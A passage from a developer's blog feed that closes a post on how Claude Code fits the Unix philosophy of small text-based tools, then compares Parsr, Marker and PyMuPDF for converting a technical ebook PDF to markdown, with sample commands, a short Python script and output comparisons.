<div class="language-csharp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">getBusinessResponse</span><span class="p">.</span><span class="n">People</span><span class="p">.</span><span class="n">Count</span><span class="p">.</span><span class="nf">Should</span><span class="p">().</span><span class="nf">Be</span><span class="p">(</span><span class="m">2</span><span class="p">);</span>
<span class="n">getBusinessResponse</span><span class="p">.</span><span class="n">People</span><span class="p">.</span><span class="nf">Should</span><span class="p">().</span><span class="nf">Contain</span><span class="p">(</span><span class="n">p</span> <span class="p">=&gt;</span> <span class="n">p</span><span class="p">.</span><span class="n">Id</span> <span class="p">==</span> <span class="n">newPersonResponse</span><span class="p">.</span><span class="n">Id</span><span class="p">);</span>
<span class="n">getBusinessResponse</span><span class="p">.</span><span class="n">People</span><span class="p">.</span><span class="nf">Should</span><span class="p">().</span><span class="nf">Contain</span><span class="p">(</span><span class="n">p</span> <span class="p">=&gt;</span> <span class="n">p</span><span class="p">.</span><span class="n">Id</span> <span class="p">==</span> <span class="n">personResponse1</span><span class="p">.</span><span class="n">Id</span><span class="p">);</span>
</code></pre></div></div>

<p>into:</p>

<div class="language-csharp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">getBusinessResponse</span><span class="p">.</span><span class="n">People</span><span class="p">.</span><span class="nf">Select</span><span class="p">(</span><span class="n">p</span> <span class="p">=&gt;</span> <span class="n">p</span><span class="p">.</span><span class="n">Id</span><span class="p">)</span>
  <span class="p">.</span><span class="nf">Should</span><span class="p">().</span><span class="nf">BeEquivalentTo</span><span class="p">(</span>
    <span class="p">[</span><span class="n">newPersonResponse</span><span class="p">.</span><span class="n">Id</span><span class="p">,</span> <span class="n">personResponse1</span><span class="p">.</span><span class="n">Id</span><span class="p">]);</span>
</code></pre></div></div>

<p>and then it can find the equivalent pattern through all the tests, and do a good job of fixing them all.<sup id="fnref:3" role="doc-noteref"><a href="#fn:3" class="footnote" rel="footnote">3</a></sup></p>

<p>Claude Code itself also follows this philosophy - instead of being tightly coupled to an IDE, it runs in a terminal, with a text interface, and they have plugins for various IDEs to provide a smarter user interface - using the editor’s context and UI elements for changes.  But basically it’s a text app - which must keep their complexity much lower than the competitors who are building their tools tightly coupled to particular editors.</p>

<p>Another example - my personal music collection is stored as mp3 files indexed and served by <a href="https://www.musicpd.org/">MPD</a>, the Music Player Daemon. It used to be in the Cathedral-like iTunes, but as Apple enshittified their apps, and my venerable iPod died (many years ago) I moved to MPD for storage, and other tools for UIs - and now this fits well with LLM tools. It has a command-line interface in <a href="https://www.musicpd.org/clients/mpc/">mpc</a>, I’m already using this to play music in Obsidian - see <a href="/2024/09/06/custom-mac-uri-schemes-obsidian">my previous blog post</a>. So it’d be easy to call this from an LLM - or wrap it in an MCP service for a home-grown Siri or Alexa like music player.</p>

<p>And a third example - this blog is written using <a href="https://jekyllrb.com/">Jekyll</a>, which means it’s just markdown text. LLMs <em>love</em> working with markdown. I don’t use LLMs to write the text<sup id="fnref:4" role="doc-noteref"><a href="#fn:4" class="footnote" rel="footnote">4</a></sup> but I can say “please turn the word Jekyll into a link” and save a lot of annoying toil. An LLM would be much harder to integrate into a heavyweight Gui blog editor like Wix.</p>

<hr />

<p>Anyway I digress. Tired brain tends to ramble. Back to my main thought - LLM code augmentation tools work best where they, and their users, embrace Unix-philosophy tools - multiple small tools that do one thing each, that interact with simple text-based formats.</p>

<p>I can see this being a bit of a struggle, and a culture clash, for people who love the Cathedral model - big complex clever systems. Often these are more powerful, more robust, more carefully engineered, and safer than the Bazaar of small independent tools. But I think LLMs are tipping the balance further to where the smaller tools, despite the risks and chaos, are dramatically more productive.</p>

<p>We just need to make sure we keep on top of the risks and chaos, and don’t drown in a world of technical debt and AI slop.</p>
<div class="footnotes" role="doc-endnotes">
  <ol>
    <li id="fn:1" role="doc-endnote">
      <p>I’m not a terminal purist - I don’t use vim, I still like GUIs for code editing, graphical tree widgets, visualisations… <a href="#fnref:1" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
    <li id="fn:2" role="doc-endnote">
      <p>I had a longer digression here but removed it as it went too far off piste! I encourage people to read the essay, it’s suprisingly relevant still <a href="#fnref:2" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
    <li id="fn:3" role="doc-endnote">
      <p>It’s non-deterministic, you have to check it for hallucinations, but they are pretty rare on simple changes like this. And it will run the tests after every change, and iterate if something goes wrong. <a href="#fnref:3" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
    <li id="fn:4" role="doc-endnote">
      <p>I’m fine with expressing my ideas in writing, though I tend to digress too much! <a href="#fnref:4" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
  </ol>
</div>]]></content><author><name>Korny Sietsma</name></author><category term="AI" /><category term="ai" /><category term="llm" /><category term="agents" /><category term="unix" /><category term="philosophy" /><category term="tools" /><summary type="html"><![CDATA[I was demonstrating Claude Code to a colleague the other day - I was working on an ASP.Net Core C# service, using Claude within the JetBrains Rider IDE. And my colleague said “it uses a lot of bash commands like find - why doesn’t it hook into the IDE to understand the structure?” I was a bit surprised by this - I quite like the way it uses small simple commands. Musing about it afterwards, I realised that this is actually an example of the Unix philosophy - “write programs that do one thing and do it well”. I am already someone who loves diving into the command-line, I have a string of handy tools I use all the time - jq, dua, ripgrep, pbcopy and pbpaste, plus all the standard shell tools like find, grep etc - I was already enjoying this aspect of using LLM-based tools; they can be easily trained to use the tools I use already. But I realise that this also reflects a philosophical difference between different software engineering communities. There are people who love lots of small unix-style tools, who live in the terminal or at least fall back to terminal commands regularly1 - but there are also people who love their IDEs, their smart powerful tooling. It reminds me somewhat of the famous essay the Cathedral and the Bazaar from way back in 1998. A pertinent quote: Linus Torvalds’s style of development—release early and often, delegate everything you can, be open to the point of promiscuity—came as a surprise. No quiet, reverent cathedral-building here—rather, the Linux community seemed to resemble a great babbling bazaar of differing agendas and approaches … out of which a coherent and stable system could seemingly emerge only by a succession of miracles. Sounds a bit familiar.2 Anyway - my colleague seemed to be surprised that the LLM wasn’t embracing the large, complicated, sophisticated modelling that a tool like Rider does - in fact up to now you needed a tool like Rider to understand complex ecosystems like ASP.Net. Whereas I quite like that it doesn’t have to - it uses the Unix philosophy - text-based input and output (which language models naturally work well with), small fast stand-alone tools, that do one thing and one thing well. And despite the continued need for powerful IDEs, the world has shifted - even Cathedrals like ASP.Net now supply quite good command-line tools like dotnet for building, formatting, linting, and testing, with an LLM-friendly text interface. With all these tools, plus the ability to iterate over solutions and use trial-and-error to course correct, LLM-based tools do a quite good job of what previously needed a huge complex IDE. Often Claude Code does a better job than the smart IDEs for a lot of refactorings. I remember when refactoring IDEs first appeared, and they were amazing - I could say “extract these lines into a function” and it just worked. But now I can say to Claude “we are doing this repetitive pattern in our tests - can you change it to test against an array using Fluent Assertions instead?” and it turns: getBusinessResponse.People.Count.Should().Be(2); getBusinessResponse.People.Should().Contain(p =&gt; p.Id == newPersonResponse.Id); getBusinessResponse.People.Should().Contain(p =&gt; p.Id == personResponse1.Id); into: getBusinessResponse.People.Select(p =&gt; p.Id) .Should().BeEquivalentTo( [newPersonResponse.Id, personResponse1.Id]); and then it can find the equivalent pattern through all the tests, and do a good job of fixing them all.3 Claude Code itself also follows this philosophy - instead of being tightly coupled to an IDE, it runs in a terminal, with a text interface, and they have plugins for various IDEs to provide a smarter user interface - using the editor’s context and UI elements for changes. But basically it’s a text app - which must keep their complexity much lower than the competitors who are building their tools tightly coupled to particular editors. Another example - my personal music collection is stored as mp3 files indexed and served by MPD, the Music Player Daemon. It used to be in the Cathedral-like iTunes, but as Apple enshittified their apps, and my venerable iPod died (many years ago) I moved to MPD for storage, and other tools for UIs - and now this fits well with LLM tools. It has a command-line interface in mpc, I’m already using this to play music in Obsidian - see my previous blog post. So it’d be easy to call this from an LLM - or wrap it in an MCP service for a home-grown Siri or Alexa like music player. And a third example - this blog is written using Jekyll, which means it’s just markdown text. LLMs love working with markdown. I don’t use LLMs to write the text4 but I can say “please turn the word Jekyll into a link” and save a lot of annoying toil. An LLM would be much harder to integrate into a heavyweight Gui blog editor like Wix. Anyway I digress. Tired brain tends to ramble. Back to my main thought - LLM code augmentation tools work best where they, and their users, embrace Unix-philosophy tools - multiple small tools that do one thing each, that interact with simple text-based formats. I can see this being a bit of a struggle, and a culture clash, for people who love the Cathedral model - big complex clever systems. Often these are more powerful, more robust, more carefully engineered, and safer than the Bazaar of small independent tools. But I think LLMs are tipping the balance further to where the smaller tools, despite the risks and chaos, are dramatically more productive. We just need to make sure we keep on top of the risks and chaos, and don’t drown in a world of technical debt and AI slop. I’m not a terminal purist - I don’t use vim, I still like GUIs for code editing, graphical tree widgets, visualisations… &#8617; I had a longer digression here but removed it as it went too far off piste! I encourage people to read the essay, it’s suprisingly relevant still &#8617; It’s non-deterministic, you have to check it for hallucinations, but they are pretty rare on simple changes like this. And it will run the tests after every change, and iterate if something goes wrong. &#8617; I’m fine with expressing my ideas in writing, though I tend to digress too much! &#8617;]]></summary></entry><entry><title type="html">Parsing pdf files is trickier than I thought</title><link href="https://blog.korny.info/2025/07/06/parsing-pdf-files-is-trickier-than-i-thought" rel="alternate" type="text/html" title="Parsing pdf files is trickier than I thought" /><published>2025-07-06T00:00:00+01:00</published><updated>2025-07-06T00:00:00+01:00</updated><id>https://blog.korny.info/2025/07/06/parsing-pdf-files-is-trickier-than-i-thought</id><content type="html" xml:base="https://blog.korny.info/2025/07/06/parsing-pdf-files-is-trickier-than-i-thought"><![CDATA[<p>I had a shower thought the other day - “I’m an ebook hoarder, I have a bunch of technical ebooks as mobi/epub files, but also pdfs.  It’d be nice to be able to slurp them up into LLM tools - for summarizing, for categorising and the rest”.  I’d already done epubs (see my recent <a href="/2025/06/27/analysing-stonemouth-with-llm">Stonemouth analysis</a>) so PDFs should be not too hard?</p>

<p>It turns out PDFs are surprisingly complex - they often aren’t linear documents at all, they are very display/print oriented - and things that appear simple like tables are actually just text in positions that looks table-like.  Ditto columnar text or any other fiddly layout.  And of course every technical PDF is full of diagrams.</p>

<p>This post won’t go into all the complexities - I’m no expert and this was more a fun “how do I get the data I want?” question than something I put a lot of time into.</p>

<p>But it boils down to - you can do this the easy way, and get poor (but maybe good enough?) results - or the hard way and get great results, very slowly (or maybe expensively)</p>

<p>I should note I’m only really dealing with PDFs that are digital-native - documents like technical books that are mostly text. A lot of the tools are full of OCR logic because a lot of older PDFs have scanned images of pages.  OCR is still needed for newer PDFs, as there is often text in graphical elements that is relevant - but it’s not as essential.</p>

<h2 id="what-did-i-try">What did I try?</h2>

<h3 id="parsr">Parsr</h3>

<p>I started with <a href="https://github.com/axa-group/Parsr">Parsr</a> from AXA Group (of all people! I knew some AXA folks in Melbourne back in the day). This is a quite complex document parsing toolkit that runs in a Docker container, and is pretty old - pre-LLM - I’m not quite sure why I tried this in hindsight; it got a lot of google hits I guess, and is a good example of what parsing PDFs was like before generative AI.</p>

<p>I ran Parsr via docker and the web UI - it was pretty straightforward:</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>docker run <span class="nt">-p</span> 3001:3001 axarev/parsr
docker run <span class="nt">-t</span> <span class="nt">-p</span> 8080:80 axarev/parsr-ui-localhost:latest
</code></pre></div></div>

<p>I didn’t record how long this took, but it was slow, but nothing as slow as Marker (below).</p>

<p>The output … wasn’t great.  Just looking at it, it had obvious problems like chopping letters off the start of paragraphs.  Colour me unimpressed.</p>

<h3 id="marker">Marker</h3>

<p>Next I tried <a href="https://github.com/datalab-to/marker">Marker</a>, which is a lot more modern, and quite complex and powerful.  It had the nice feature of being able to plug in an LLM, including free ollama LLMs, to do the complex interpretation of things like images and tables.</p>

<p>I won’t go through all the ollama setup, but the gist of what I ran was:</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>uv init <span class="c"># setting up a local uv project</span>
uv add torch torchvision
uv add marker-pdf

uv run marker_single my_pdf_file.pdf <span class="se">\</span>
    <span class="nt">--use_llm</span> <span class="se">\</span>
    <span class="nt">--llm_service</span> marker.services.ollama.OllamaService <span class="se">\</span>
    <span class="nt">--ollama_base_url</span> http://localhost:11434 <span class="se">\</span>
    <span class="nt">--ollama_model</span> gemma3 <span class="se">\</span>
    <span class="nt">--output_dir</span> my_pdf_file <span class="se">\</span>
    <span class="nt">--output_format</span> markdown <span class="se">\</span>
    <span class="nt">--disable_image_extraction</span>
</code></pre></div></div>

<p>This took <em>forever</em> !  And it was very slow to show progress, and logs were minimal.  For quite a while I assumed it had crashed, and gave up and used Python (see below) - but I went back and tried again, and realised it <em>was</em> working - but glacially slowly.  I left it running overnight - the eventual time to process a 12MB technical ebook was 15 hours!!!</p>

<p>It’s quite possible this was due to the limitations of free LLMs.  I used the gemma3 model, I want to try other models that might be faster; but having spent 15 hours waiting, I’m not in a rush to benchmark others.</p>

<p>It’s probably a <em>lot</em> faster to use a paid LLM, sadly my Claude Code license seems to come with severe rate limits for the underlying Anthropic APIs, so I couldn’t really try that.</p>

<p>The output, however, was great.  More on that later</p>

<p><strong>UPDATE</strong> I tried a different model - the new <a href="https://ollama.com/library/gemma3n">gemma3n model</a> “for efficient execution on everyday devices” - and it was drastically faster.  Under 3 minutes. So there must have been some massive bottleneck using gemma3?  But - the gemma3n output had some major flaws - hallucinations in tables, for instance!  I need to investigate this more when I have time.</p>

<h3 id="pymypdf">PyMyPDF</h3>

<p>Finally, I tried a Python library - a bit of digging suggested <a href="https://pymupdf.readthedocs.io/">PyMuPDF</a> which is very popular and has a specific <a href="https://pymupdf.readthedocs.io/en/latest/pymupdf4llm/index.html">PyMyPDF4LLM</a> model for LLM use.</p>

<p>I wrote (well, Claude mostly wrote) a very simple script:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/env -S uv run
# /// script
# requires-python = "&gt;=3.8"
# dependencies = [
#     "pymupdf4llm",
# ]
# ///
</span><span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">import</span> <span class="nn">pathlib</span>
<span class="kn">import</span> <span class="nn">pymupdf4llm</span>

<span class="k">def</span> <span class="nf">convert_pdf_to_markdown</span><span class="p">(</span><span class="n">pdf_path</span><span class="p">,</span> <span class="n">output_path</span><span class="p">):</span>
    <span class="n">md_text</span> <span class="o">=</span> <span class="n">pymupdf4llm</span><span class="p">.</span><span class="n">to_markdown</span><span class="p">(</span><span class="n">pdf_path</span><span class="p">)</span>
    <span class="n">pathlib</span><span class="p">.</span><span class="n">Path</span><span class="p">(</span><span class="n">output_path</span><span class="p">).</span><span class="n">write_bytes</span><span class="p">(</span><span class="n">md_text</span><span class="p">.</span><span class="n">encode</span><span class="p">())</span>
    <span class="k">return</span> <span class="n">output_path</span>


<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
    <span class="n">pdf_file</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span>
    <span class="n">output_file</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span>
    <span class="n">convert_pdf_to_markdown</span><span class="p">(</span><span class="n">pdf_file</span><span class="p">,</span> <span class="n">output_file</span><span class="p">)</span>

<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">"__main__"</span><span class="p">:</span>
    <span class="n">main</span><span class="p">()</span>
</code></pre></div></div>

<p>(Claude’s script had more logging and error checking, I’ve trimmed it down for this blog)</p>

<p>This was very fast by comparison with the others - the same 12MB file took 28 seconds to convert!</p>

<p>The output wasn’t <em>great</em> - but it was probably fine for LLM summaries, if you don’t mind losing some sense of the content of tables, and skipping images almost entirely.</p>

<h2 id="what-did-i-use-as-a-test-document">What did I use as a test document?</h2>

<p>I used <a href="https://www.goodreads.com/book/show/38396693-the-design-of-web-apis">“The Design of Web APIs” by Arnaud Lauret</a> as my test document. The choice was somewhat random - I had it in my ebook collection, and it seemed like a good mix of text, diagrams, code samples, and tables that would test the various parsing tools.</p>

<p>The PDF was 12MB in size, with 396 pages and a nice mix of text, diagrams, code snippets and tables.</p>

<h2 id="output-comparison">Output comparison</h2>

<h3 id="basic-text">Basic text</h3>

<p>Basic text shouldn’t be too hard, you’d think.  Here is a sample from the ebook:</p>

<p><img src="/assets/images/2025-07-06-pdf-parsing/pdf-text-comparison.png" alt="PDF text parsing comparison" /></p>

<p><strong>Parsr</strong> handled this relatively OK, but it didn’t handle words split by a line ending at all well:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>What do people do when they shop online? Well, they buy some products. And how do they buy these products? They add them to their shopping cart and then check out. Nothing new for these two frst questions. Let’s now dig into each step to determine its inputs and outputs.  
We’ll start with the add products to the cart goal. What do people need to add a prod- uct to a cart? They obviously need a product and a cart. Good, and do they get some- thing in return when they add a product to their cart? No. Well, these new questions do not seem to give us any really useful information; the answers are quite obvious. Maybe we will get something more interesting for the check out step  
</code></pre></div></div>

<p>Also, it couldn’t read the word “first”! “Nothing new for these two frst questions” - I guess “first” was using a ligature that the parser didn’t understand?</p>

<p><strong>PyMyPdf</strong> and <strong>Marker</strong> both handled hyphenated words at line endings successfully - but both also stumbled on “frst”.</p>

<p>(I won’t include samples as they are basically the same as the above, but with “product” and “something” as single words)</p>

<h3 id="code-snippets">Code snippets</h3>

<p>All the tools did a decent job of recognising code snippets - I think they tend to be in a monospace font which makes recognising them easier.</p>

<h3 id="tables">Tables</h3>

<p>Tables are fiddly as they aren’t stored as tabular info in the pdf, just as text with positions:</p>

<p><img src="/assets/images/2025-07-06-pdf-parsing/pdf-table-comparison.png" alt="PDF table parsing comparison" /></p>

<p><strong>Parsr</strong> didn’t cope well with the row separation:</p>

<table>
  <thead>
    <tr>
      <th>HTTP method</th>
      <th>Action</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>POST (and PUT in creation) GET PATCH/PUT DELETE</td>
      <td>Create a customer, add a meal to a menu, order goods, start a timer, save a blog post, send a message to customer service, subscribe to a service, sign a contract, open a bank account, upload a photo, share a status on a social network, and so on Read a customer, search for a French restaurant, find new friends, retrieve opened accounts for the last 3 months, download a signed contract, filter best selling books, select black-and-white photos, list friends, and so forth Update a customer, replace goods in an order, switch plane seat, edit an order’s delivery method, change an order’s currency, modify a debit card limit, temporarily block a credit card, and so on Delete a customer, cancel an order, close a case, terminate a process, stop a timer, and so on</td>
    </tr>
  </tbody>
</table>

<p><strong>Marker</strong> did much better:</p>

<table>
  <thead>
    <tr>
      <th>HTTP method</th>
      <th>Action</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>POST (and PUT<br />in creation)</td>
      <td>Create a customer, add a meal to a menu, order goods, start a timer, save a blog post,<br />send a message to customer service, subscribe to a service, sign a contract, open a bank<br />account, upload a photo, share a status on a social network, and so on</td>
    </tr>
    <tr>
      <td>GET</td>
      <td>Read a customer, search for a French restaurant, find new friends, retrieve opened<br />accounts for the last 3 months, download a signed contract, filter best selling books,<br />select black-and-white photos, list friends, and so forth</td>
    </tr>
    <tr>
      <td>PATCH/PUT</td>
      <td>Update a customer, replace goods in an order, switch plane seat, edit an order’s delivery<br />method, change an order’s currency, modify a debit card limit, temporarily block a credit<br />card, and so on</td>
    </tr>
    <tr>
      <td>DELETE</td>
      <td>Delete a customer, cancel an order, close a case, terminate a process, stop a timer, and<br />so on</td>
    </tr>
  </tbody>
</table>

<p><strong>PyMyPdf</strong> was similar to Parsr</p>

<table>
  <thead>
    <tr>
      <th>HTTP method</th>
      <th>Action</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>POST (and PUT<br />in creation)<br />GET<br />PATCH/PUT<br />DELETE</td>
      <td>Create a customer, add a meal to a menu, order goods, start a timer, save a blog post,<br />send a message to customer service, subscribe to a service, sign a contract, open a bank<br />account, upload a photo, share a status on a social network, and so on<br />Read a customer, search for a French restaurant, fnd new friends, retrieve opened<br />accounts for the last 3 months, download a signed contract, flter best selling books,<br />select black-and-white photos, list friends, and so forth<br />Update a customer, replace goods in an order, switch plane seat, edit an order’s delivery<br />method, change an order’s currency, modify a debit card limit, temporarily block a credit<br />card, and so on<br />Delete a customer, cancel an order, close a case, terminate a process, stop a timer, and<br />so on</td>
    </tr>
  </tbody>
</table>

<h3 id="images">Images</h3>

<p>Images it turns out seem to get processed in a few ways depending on the content; and also the tools. <strong>Parsr</strong> was configured to generate markdown with images, so it sometimes tried to interpret images, and sometimes just copied them - this makes some sense, as if the image is actually a table you’d prefer it to be turned into markdown.</p>

<p>Whereas <strong>PyMyPdf</strong> didn’t really have any explicit handling for images, it would just try to parse them as text; and <strong>Marker</strong> with the <code class="language-plaintext highlighter-rouge">--disable_image_extraction</code> parameter tried to replace images with descriptions if they weren’t otherwise identifiable.</p>

<p>I’ll split images into a few key types as they get handled quite differently:</p>

<h4 id="diagrams">Diagrams</h4>

<p>Diagrams have text and boxes in them - the results were a bit of a mixed bag.</p>

<p><img src="/assets/images/2025-07-06-pdf-parsing/pdf-diagram-comparison.png" alt="PDF diagram parsing comparison" /></p>

<p><strong>Parsr</strong> tried to just turn it into text, and didn’t do so well - but it’s still better than the others in this case:</p>

<div class="language-markdown highlighter-rouge"><div class="highlight"><pre class="highlight"><code>What do people want to do when they

How do people use an oven?

heat food?

They heat food  
Heat food They want to  
at?a given power  
at power heat food!  
for a given duration.  
for duration

Whats Hows Goals

Investigate what is done and how it is done...  
...to identify goals
</code></pre></div></div>

<p><strong>Marker</strong> actually failed to process this one at all.  In other cases it did OK with text descriptions, but never great.  This was possibly a limitation of the free LLM it used.</p>

<p><strong>PyMyPdf</strong> also did pretty badly:</p>

<div class="language-markdown highlighter-rouge"><div class="highlight"><pre class="highlight"><code>What do people

Investigate what is done and how it is done... ...to identify goals
</code></pre></div></div>

<p>Interestingly, I asked <strong>Claude Code</strong> to process this same image into a mermaid.js snippet - it’d be very cool to have a pdf parser that could do this, when appropriate:</p>

<pre><code class="language-mermaid">flowchart TB
    %% Speech bubbles (using stadium shape as approximation)
    Q1("What do people&lt;br/&gt;want to do when they&lt;br/&gt;use an oven?")
    Q2("How do people&lt;br/&gt;heat food?")
    
    %% White boxes
    W1[They want to&lt;br/&gt;heat food!]
    W2[They heat food&lt;br/&gt;at a given power&lt;br/&gt;for a given duration.]
    
    %% Black box (goal)
    G[Heat food&lt;br/&gt;at power&lt;br/&gt;for duration]:::goal
    
    %% Bottom boxes
    Whats[Whats]
    Hows[Hows]
    Goals[Goals]:::goal
    
    %% Connections
    Q1 --&gt; W1
    Q2 --&gt; W2
    W2 --&gt; G
    
    %% Bottom flow
    Whats --&gt; Hows --&gt; Goals
    
    %% Vertical connections (dashed)
    W1 -.-&gt; Whats
    W2 -.-&gt; Hows
    G -.-&gt; Goals
    
    %% Bottom labels (using invisible nodes for positioning)
    subgraph bottom [" "]
        direction LR
        inv1[Investigate what is done and how it is done...]:::invisible
        inv2[...to identify goals]:::invisible
    end
    
    %% Styling
    classDef goal fill:#000,color:#fff
    classDef invisible fill:transparent,stroke:none
    
    %% Hide subgraph box
    style bottom fill:transparent,stroke:none
</code></pre>

<h4 id="screenshots">Screenshots</h4>

<p><img src="/assets/images/2025-07-06-pdf-parsing/pdf-screenshot-comparison.png" alt="PDF screenshot parsing comparison" /></p>

<p><strong>Parsr</strong> just saved this as an image - probably the best option for a mixed markdown-and-images output.</p>

<p><strong>Marker</strong> made a table - this is a decent effort, though given the limitations of markdown tables it couldn’t really make it work. You can also see the limitations of OCR on small text:</p>

<table>
  <thead>
    <tr>
      <th>Q Search</th>
      <th>Create a money transfer</th>
      <th> </th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Authentication</td>
      <td>This operation allows one to transfer an amount of money from a source account to a destination account. There are three different types of</td>
      <td> </td>
    </tr>
    <tr>
      <td>Transfers<br />$\checkmark$</td>
      <td>money transfer:<br />• Immediate – these are executed as soon as the request is received</td>
      <td> </td>
    </tr>
    <tr>
      <td><b>POST</b> Create a money transfer</td>
      <td>• Delaved - these are executed upon a given future date<br />· Recurring - these are executed a given occurrences number of times at a given frequency - the first occurrence being executed immediately</td>
      <td> </td>
    </tr>
    <tr>
      <td><b>COL</b> List money transfers</td>
      <td>or at a given date</td>
      <td> </td>
    </tr>
    <tr>
      <td><b>CIT</b> Get a money transfer</td>
      <td>BankingAPIScopes (transfericreate, transferiadmin)<br /><b>AUTHORIZATIONS</b></td>
      <td> </td>
    </tr>
    <tr>
      <td>Cancel a money transfer</td>
      <td>REQUEST BODY SCHEMA: application/json</td>
      <td> </td>
    </tr>
    <tr>
      <td><b>Beneficiaries</b></td>
      <td>string 15 characters /^\d{15}$/<br />source<br />required<br />Source account number</td>
      <td> </td>
    </tr>
    <tr>
      <td>Accounts</td>
      <td>destination<br />string 15 characters /^\d{15}$/<br />required<br />Destination account number</td>
      <td> </td>
    </tr>
  </tbody>
</table>

<p><strong>PyMyPdf</strong>, unsurprisingly, didn’t even try with this one.</p>

<h4 id="photos">Photos</h4>

<p><img src="/assets/images/2025-07-06-pdf-parsing/Arnaud%20Lauret.png" alt="Arnaud Lauret" /></p>

<p><strong>Parsr</strong> naturally just saved this as an image.</p>

<p><strong>Marker</strong> did … poorly:</p>

<div class="language-markdown highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Image /page/22/Picture/1 description: A bar chart titled "Fruit Preference Survey" is shown. The x-axis shows the types of fruits, and the y-axis shows the number of people. The bar chart shows that most people prefer apples, followed by bananas and oranges. 20 people prefer apples, 15 people prefer bananas, and 10 people prefer oranges.
</code></pre></div></div>

<p>I guess the LLM misinterpreted the books and turned them into a barchart hallucination? Not so good, gemma3 model.</p>

<p><strong>PyMyPdf</strong> didn’t even try to handle the image.</p>

<p><strong>Claude Code</strong>, by comparison, did a great job - so Marker with a commercial LLM would probably produce something similar:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>This is a photo of a man with glasses and a beard, wearing a dark blue
  t-shirt with "RESPECT API GUIDELINES" text on it. He's standing in front
  of a white bookshelf filled with technical books and what appears to be
  board games. The person appears to be in a home office or study setting.
</code></pre></div></div>

<h2 id="conclusion">Conclusion</h2>

<p>This was a kind-of fun digression.  I think it’s pretty clear though that I have basically two (or three?) options here:</p>

<ol>
  <li>If I just want an LLM to summarize an ebook that is mostly text, PyMyPdf is <em>fine</em>.  It’s fast, easy, and there’s enough context for it to work with.</li>
  <li>If I want a full markdown version of an ebook, for detailed analysis or copying sections to Obsidian or something, it’d be worth using Marker - though maybe not with the “images as descriptions” setting.
    <ul>
      <li>Using a free ollama LLM can be fine if I have lots of time, don’t mind some spurious descriptions, and can fiddle models / time.  (this needs investigation)</li>
      <li>But maybe if I wanted something higher quality, it’d be worth using it with a commercial LLM.</li>
    </ul>
  </li>
</ol>]]></content><author><name>Korny Sietsma</name></author><category term="AI" /><category term="llm" /><category term="pdf" /><category term="tools" /><category term="claude" /><summary type="html"><![CDATA[I had a shower thought the other day - “I’m an ebook hoarder, I have a bunch of technical ebooks as mobi/epub files, but also pdfs. It’d be nice to be able to slurp them up into LLM tools - for summarizing, for categorising and the rest”. I’d already done epubs (see my recent Stonemouth analysis) so PDFs should be not too hard? It turns out PDFs are surprisingly complex - they often aren’t linear documents at all, they are very display/print oriented - and things that appear simple like tables are actually just text in positions that looks table-like. Ditto columnar text or any other fiddly layout. And of course every technical PDF is full of diagrams. This post won’t go into all the complexities - I’m no expert and this was more a fun “how do I get the data I want?” question than something I put a lot of time into. But it boils down to - you can do this the easy way, and get poor (but maybe good enough?) results - or the hard way and get great results, very slowly (or maybe expensively) I should note I’m only really dealing with PDFs that are digital-native - documents like technical books that are mostly text. A lot of the tools are full of OCR logic because a lot of older PDFs have scanned images of pages. OCR is still needed for newer PDFs, as there is often text in graphical elements that is relevant - but it’s not as essential. What did I try? Parsr I started with Parsr from AXA Group (of all people! I knew some AXA folks in Melbourne back in the day). This is a quite complex document parsing toolkit that runs in a Docker container, and is pretty old - pre-LLM - I’m not quite sure why I tried this in hindsight; it got a lot of google hits I guess, and is a good example of what parsing PDFs was like before generative AI. I ran Parsr via docker and the web UI - it was pretty straightforward: docker run -p 3001:3001 axarev/parsr docker run -t -p 8080:80 axarev/parsr-ui-localhost:latest I didn’t record how long this took, but it was slow, but nothing as slow as Marker (below). The output … wasn’t great. Just looking at it, it had obvious problems like chopping letters off the start of paragraphs. Colour me unimpressed. Marker Next I tried Marker, which is a lot more modern, and quite complex and powerful. It had the nice feature of being able to plug in an LLM, including free ollama LLMs, to do the complex interpretation of things like images and tables. I won’t go through all the ollama setup, but the gist of what I ran was: uv init # setting up a local uv project uv add torch torchvision uv add marker-pdf uv run marker_single my_pdf_file.pdf \ --use_llm \ --llm_service marker.services.ollama.OllamaService \ --ollama_base_url http://localhost:11434 \ --ollama_model gemma3 \ --output_dir my_pdf_file \ --output_format markdown \ --disable_image_extraction This took forever ! And it was very slow to show progress, and logs were minimal. For quite a while I assumed it had crashed, and gave up and used Python (see below) - but I went back and tried again, and realised it was working - but glacially slowly. I left it running overnight - the eventual time to process a 12MB technical ebook was 15 hours!!! It’s quite possible this was due to the limitations of free LLMs. I used the gemma3 model, I want to try other models that might be faster; but having spent 15 hours waiting, I’m not in a rush to benchmark others. It’s probably a lot faster to use a paid LLM, sadly my Claude Code license seems to come with severe rate limits for the underlying Anthropic APIs, so I couldn’t really try that. The output, however, was great. More on that later UPDATE I tried a different model - the new gemma3n model “for efficient execution on everyday devices” - and it was drastically faster. Under 3 minutes. So there must have been some massive bottleneck using gemma3? But - the gemma3n output had some major flaws - hallucinations in tables, for instance! I need to investigate this more when I have time. PyMyPDF Finally, I tried a Python library - a bit of digging suggested PyMuPDF which is very popular and has a specific PyMyPDF4LLM model for LLM use. I 